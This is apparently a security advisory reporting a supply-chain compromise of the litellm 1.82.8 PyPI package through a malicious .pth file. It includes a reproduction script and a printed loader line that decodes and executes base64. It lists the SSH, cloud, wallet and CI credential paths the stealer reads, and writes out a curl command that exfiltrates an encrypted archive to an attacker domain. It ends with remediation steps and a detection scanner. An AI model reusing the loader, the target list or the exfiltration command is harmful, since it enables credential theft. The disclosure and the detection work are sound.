LiteLLM Python package compromised by supply-chain attack

The LiteLLM version 1.82.8 on PyPI has been compromised with a malicious .pth file that automatically executes a credential-stealing script, targeting SSH keys, cloud credentials, and environment variables.
Description
[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer
Summary
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package's own RECORD:
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628
Reproduction
# Download the wheel without installing it
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
# Locate the downloaded wheel and list any .pth files it ships
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        # Print only the first 300 bytes of each .pth file
        print(z.read(p)[:300])
"
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])
Malicious Behavior (full analysis)
The payload is double base64-encoded. When decoded, it performs the following:
Stage 1: Information Collection
The script collects sensitive data from the host system:
- System info: hostname, whoami, uname -a, ip addr, ip route
- Environment variables: printenv (captures all API keys, secrets, tokens)
- SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
- Git credentials: ~/.gitconfig, ~/.git-credentials
- AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
- Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
- GCP credentials: ~/.config/gcloud/application_default_credentials.json
- Azure credentials: ~/.azure/
- Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
- Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
- Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
- Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
- SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
- CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
- Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
- Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
Stage 2: Encryption & Exfiltration
- Collected data is written to a temporary file
- A random 32-byte AES-256 session key is generated via openssl rand
- The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
- The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
- Both encrypted files are packed into tpcp.tar.gz
- The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gz
Key Technical Details
- Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
- Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
- Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
- RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...
Impact
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
This affects:
- Local development machines
- CI/CD pipelines
- Docker containers
- Production servers
Affected Version
- Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
- Other versions: Not yet checked — the attacker may have compromised multiple releases
Recommended Actions
- PyPI: Yank/remove litellm 1.82.8 immediately
- Users: Check for litellm_init.pth in your site-packages/ directory
- Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
- BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise
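One way to carry out the site-packages check above, and to find any other .pth file that runs code at startup (an added example, not part of the original report or of LiteLLM). It mirrors how Python's site module treats .pth files, executing only lines that begin with import; the token list and the function names are assumptions of this example.

```python
import base64, hashlib, re, site, sys
from pathlib import Path

# IoC values copied from the report above.
IOC_NAME = "litellm_init.pth"
IOC_RECORD_HASH = "sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg"
# Heuristic token list (an assumption of this example): things a path file should never need.
SUSPICIOUS = re.compile(r"\b(subprocess|Popen|exec|eval|base64|b64decode|urllib|socket|os\.system)\b")

def record_hash(path):
    """Hash a file the way a wheel RECORD does: urlsafe base64 of SHA-256, no padding."""
    digest = hashlib.sha256(Path(path).read_bytes()).digest()
    return "sha256=" + base64.urlsafe_b64encode(digest).rstrip(b"=").decode()

def executable_lines(path):
    """Return the lines of a .pth file that the site module would exec() at startup."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return [l for l in text.splitlines() if l.startswith(("import ", "import\t"))]

def scan_dir(directory):
    """Return one finding per .pth file in directory that runs code or matches an IoC."""
    findings = []
    for pth in sorted(Path(directory).glob("*.pth")):
        lines = executable_lines(pth)
        reasons = []
        if pth.name == IOC_NAME:
            reasons.append("filename matches reported IoC")
        if record_hash(pth) == IOC_RECORD_HASH:
            reasons.append("hash matches reported RECORD entry")
        if any(SUSPICIOUS.search(l) for l in lines):
            reasons.append("import line spawns/decodes/executes code")
        if lines or reasons:
            findings.append({"file": pth.name, "exec_lines": len(lines), "reasons": reasons})
    return findings

def site_dirs():
    """Site-packages directories of the running interpreter (global and per-user)."""
    dirs = set(site.getsitepackages()) if hasattr(site, "getsitepackages") else set()
    dirs.add(site.getusersitepackages())
    return [d for d in dirs if Path(d).is_dir()]

if __name__ == "__main__":
    for d in sys.argv[1:] or site_dirs():
        for f in scan_dir(d):
            level = "ALERT" if f["reasons"] else "review"
            print(f"[{level}] {d}/{f['file']}: {f['exec_lines']} exec line(s); {', '.join(f['reasons'])}")
```

Run it with python3 -S and pass the site-packages directories to inspect as arguments, so the scanning interpreter does not itself process the .pth files it is checking.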
Environment
- OS: Ubuntu 24.04 (Docker container)
- Python: 3.13
- pip installed from PyPI
- Discovered: 2026-03-24
Source: Hacker News









